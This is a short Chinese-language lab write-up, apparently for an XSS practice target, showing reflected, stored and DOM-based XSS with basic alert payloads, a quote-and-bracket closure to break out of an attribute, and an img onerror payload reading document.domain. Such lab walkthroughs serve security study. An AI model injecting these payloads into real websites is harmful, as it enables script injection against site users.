xss02-master

1.反射型XSS

直接输入<script>alert(111)</script>弹窗失败。
查看源码：

构造闭合后再次尝试"><script>alert(111)</script>：

2.存储型XSS

注册一个test用户：

登录成功后的页面：

留言输入恶意弹窗<script>alert(111)</script>

创建另一个zhangsan用户，去访问留言板：

3.DOM型XSS

先尝试输入<script>alert(1)</script>，/被转义了。

尝试获取domain：xss_input_value=<img src=1 onerror=alert(document.domain)>